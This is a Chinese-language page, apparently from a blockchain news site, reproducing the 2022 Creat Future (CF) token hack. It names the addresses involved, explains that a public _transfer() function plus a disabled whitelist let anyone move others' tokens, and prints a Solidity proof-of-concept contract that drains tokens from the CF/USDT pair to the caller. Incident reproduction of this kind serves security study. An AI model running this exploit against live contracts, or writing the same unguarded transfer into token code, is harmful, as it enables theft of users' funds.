Creat Future 攻击复现

  • 时间:
  • 浏览:34
  • 来源:区块链技术网

北京时间 2022 年 4 月 11 日, CF 代币合约被发现存在未验证发送者权限的漏洞,它允许任何人转移他人的 CF 余额。到目前为止,损失约为 190 万美元,而 pancakeswap 上 CF/USDT 交易对已经受到影响。

合约所有者地址:0xcd87248c74915e85f80293f10dcf300a73bc6581

攻击者地址(其中一个):0xee0221d76504aec40f63ad7e36855eebf5ea5edd

交易 hash(其中一个):0xc7647406542f8f2473a06fea142d223022370aa5722c044c2b7ea030b8965dd0

漏洞合约:0x8B7218CF6Ac641382D7C723dE8aA173e98a80196

漏洞分析

这个漏洞的能够实现主要是以下两点

  1. 管理员将 useWhiteListSwith 设置为 false
  2. _transfer() 函数为public。

2022-3-11日,管理员将useWhiteListSwith设置为false

导致_transfer()检查白名单的语句失效

分析tx0xc7647406542f8f2473a06fea142d223022370aa5722c044c2b7ea030b8965dd0

由于任何人都可以调用 _transfer() 函数加上没有了白名单的权限检测判断,导致了任何人都可以调用该函数转走其他地址的代币。

poc

pragma solidity ^0.6.0;
// ganache-cli -f https://speedy-nodes-nyc.moralis.io/bsc/mainnet/archive@16841980
interface ICFToken {
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) external;
    function balanceOf(address account) external view returns (uint256);
    function transfer(address recipient, uint256 amount)
        external
        returns (bool);

}

contract Attack { 
    address public cftoken = 0x8B7218CF6Ac641382D7C723dE8aA173e98a80196;
    address public cfpair = 0x7FdC0D8857c6D90FD79E22511baf059c0c71BF8b;
    ICFToken cfToken;
    event PrintBalance(uint256);
    function attack() public  {
        cfToken = ICFToken(cftoken);
        emit PrintBalance(cfToken.balanceOf(msg.sender));
        cfToken._transfer(cfpair,payable(msg.sender),1000000000000000000000);
        emit PrintBalance(cfToken.balanceOf(msg.sender));
    }
}

参考:Creat Future 攻击事件 (qq.com)

猜你喜欢

安银爆雷和虎符维权的真相

在今年luna爆雷和进而引起的defi清算过程中,一些中心化交易所因为风控不严格导致交易所陷入流动性危机。其中两家产生后果非常严重的,一家是安银(AEX),一家是虎符(HOO)

2022-07-30

USDT到底会不会爆雷?

最近关于USDT会不会爆雷这件事争议很大,起源是有消息称一家传统对冲基金用数亿美元做空USDT,但拥有670亿美元市值的USDT真的能被轻易做空吗?我们在思考这个问题之前需要先

2022-07-30

交易所累计裁员近万人,却暴露了一个秘密

对于今天的行情,良心哥昨天已经做了提示。在文章里,我告诉你们,未来可能要去嫖免费的猪脚饭。在课程里,说的很清楚,我对未来的行情依然持续看空。今年的币圈,是真的不好过。甚至连交易

2022-07-30

一周之内,又有几个人进去了

五月的币圈,弥漫着颓丧的味道。韭菜们在五月份遭受的打击已经够多了,很多人直到今天才缓过一口气来,因为行情出现了小幅反弹。至于为什么是会出现黑色五月,答案其实也离谱的简单——农时

2022-07-30

时空云创始人被警方带走调查,三大矿商均已爆雷!

五月份的币圈真是多灾多难。先是5.10的时候ust和luna爆雷,直接给币圈炸没了几千亿的市值。受此影响,5.12行情一度下探到26700,行情到现在一直萎靡不振。紧接着聚集了

2022-07-30